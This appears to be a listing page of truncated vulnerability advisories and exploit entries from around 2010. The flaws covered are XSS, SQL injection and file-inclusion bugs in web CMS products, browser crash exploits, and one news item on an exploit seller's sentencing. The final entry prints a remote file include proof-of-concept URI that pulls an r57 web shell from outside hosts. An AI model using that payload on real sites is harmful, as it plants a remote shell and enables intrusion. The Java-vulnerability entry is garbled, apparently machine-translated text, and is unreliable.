WordPress Plugin Gigya Socialize 1.01.1.x - Cross-Site Scripting

WordPress Plugin Gigya Socialize 1.01.1.x - Cross-Site Scripting source: https://www.securityfocus.com/bid/40582/info The Gigya Socialize Plugin for Wordpress is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. An attacker may leverage this...

ImpressPages CMS 1.0.4 SQL Injection

Vulnerability ID: HTB22386 Reference: http://www.htbridge.ch/advisory/sqlinjectionvulnerabilityinimpresspagescms2.html Product: ImpressPages CMS Vendor: Apro Media Vulnerable Version: 1.0.4 and Probably Prior Versions Vendor Notification: 12 May 2010 Vulnerability Type: SQL Injection Status: Fixe...

SQL injection vulnerability in 360 Web Manager

Vulnerability ID: HTB22379 Reference: http://www.htbridge.ch/advisory/sqlinjectionvulnerabilityin360webmanager1.html Product: 360 Web Manager Vendor: 360 Web Manager Vulnerable Version: 3.0 Vendor Notification: 10 May 2010 Vulnerability Type: SQL Injection Status: Not Fixed, Vendor Alerted,...

360 Web Manager 3.0 Cross Site Scripting

Vulnerability ID: HTB22377 Reference: http://www.htbridge.ch/advisory/xssvulnerabilityin360webmanager.html Product: 360 Web Manager Vendor: 360 Web Manager Vulnerable Version: 3.0 Vendor Notification: 10 May 2010 Vulnerability Type: XSS Cross Site Scripting Status: Not Fixed, Vendor Alerted,...

Ruubik CMS 1.0.3 Cross Site Scripting

Vulnerability ID: HTB22380 Reference: http://www.htbridge.ch/advisory/xssvulnerabilityinruubikcms.html Product: RuubikCMS Vendor: Piuha Vulnerable Version: 1.0.3 and Probably Prior Versions Vendor Notification: 10 May 2010 Vulnerability Type: XSS Cross Site Scripting Status: Not Fixed, Vendor...

LiSK CMS 4.4 edit_email.php SQL Injection

Vulnerability ID: HTB22373 Reference: http://www.htbridge.ch/advisory/sqlinjectionvulnerabilityinliskcms1.html Product: LiSK CMS Vendor: Createch-group Vulnerable Version: 4.4 Vendor Notification: 06 May 2010 Vulnerability Type: SQL Injection Status: Not Fixed, Vendor Alerted, Awaiting Vendor...

ecoCMS Cross Site Scripting

Vulnerability ID: HTB22353 Reference: http://www.htbridge.ch/advisory/xssinecocms.html Product: ecoCMS Vendor: ecoCMS Team Vulnerable Version: Current at 18.04.2010 and Probably Prior Versions Vendor Notification: 18 April 2010 Vulnerability Type: XSS Cross Site Scripting Status: Not Fixed, Vendo...

browsers Crash Exploit(Mozilla Firefox/Internet Explorer/Google Chrome/Netscape/Opera)

No description provided by source. @Title: All browsers 0day Crash Exploit @Site: http://site.securityspl0its.com/ - http://forum.securityspl0its.com/ - @Exploit for all browsers Tested on: Mozilla Firefox // Internet Explorer // Google Chrome // Netscape // Opera: body...

Pligg CMS 1.1.2 (status) Parameter SQL Injection Vulnerability

Exploit for php platform in category web applications Pligg CMS 'status' Parameter SQL Injection Vulnerability Pligg CMS is prone to an SQL-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in an SQL query. A successful exploit could...

Madirish Webmail 2.01 (basedir) RFI/LFI Vulnerability

Madirish Webmail is prone to Multiple vulnerabilities because it fails to properly sanitize user-supplied input. An attacker can exploit these vulnerabilities to obtain potentially sensitive information and execute arbitrary local scripts in the context of the webserver process. This may allow th...

TJX Browser Exploit Accomplice Gets Probation

A computer security professional who sold Internet Explorer exploit code to credit card hacker Albert Gonzalez was sentenced Tuesday to three years probation and a $10,000 fine. Jeremy Jethro, 29, was paid $60,000 by Gonzalez for a zero-day exploit against Microsoft’s browser, “the purpose and...

Softbiz Jobs - 'sbad_type' Cross-Site Scripting

source: https://www.securityfocus.com/bid/38383/info Softbiz Jobs is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context ...

Winamp 5.57 (Browser) IE Denial of Service Exploit

No description provided by source. !-- +---------------------------------------------------------------------------------+ Winamp 5.57 Browser IE Denial of Service Exploit Homepage: http://www.winamp.com/ Exploit Coded by: cr4wl3r cr4wl3r\x40linuxmail\x2Eorg From: Indonesia Tested Win xpsp2 Greet...

Microsoft Agent Crafted URL Stack Buffer Overflow (MS07-051; CVE-2007-3040)

The Microsoft Agent ActiveX control, exposes a set of methods and properties that can be used for scripting in HTML pages. There exists a buffer overflow vulnerability in Microsoft Windows Agent application. The flaw is due to wrongfully copying an overly large string to a fixed-size stack buffer...

DigitalHive - 'mt' Cross-Site Scripting

source: https://www.securityfocus.com/bid/37697/info DigitalHive is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context o...

Java vulnerabilities just to be on the attack code then we to-vulnerability warning-the black bar safety net

Using the Java virtual machine if you have not installed the Sun for Mac OS X, Windows, Linux with the latest security update, now will be a make up for the fault of timing. A security researcher local time on Thursday released a derived from the Mac OS X Java Runtime Environment vulnerability...

Joomla! Component com_mygallery - 'cid' SQL Injection

Bugtraq ID: 37121 Class: Input Validation Error Published: Feb 21 2008 12:00AM Updated: Nov 24 2009 10:15PM Credit: S@BUN Vulnerable: Joomla commygallery 0 The 'commygallery' component for Joomla! is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied...

Joomla! 'com_mygallery' Component 'cid' Parameter SQL Injection Vulnerability

No description provided by source. Bugtraq ID: 37121 Class: Input Validation Error Published: Feb 21 2008 12:00AM Updated: Nov 24 2009 10:15PM Credit: S@BUN Vulnerable: Joomla commygallery 0 The 'commygallery' component for Joomla! is prone to an SQL-injection vulnerability because it fails to...

Article Directory Index.PHP Remote File Include Vulnerability

Article Directory Index.PHP Remote File Include Vulnerability. Webapps exploit for php platform An attacker can exploit this issue via a browser. The following proof-of-concept URI is available:...

Article Directory Index.PHP Remote File Include Vulnerability

No description provided by source. An attacker can exploit this issue via a browser. The following proof-of-concept URI is available: http://www.example.com/index.php?page=http://www.example2.com/r57.txt?http://www.goodayelinks.com/index.php?page=http://www.nykola.ch/Sefirotr0x/r57.txt?...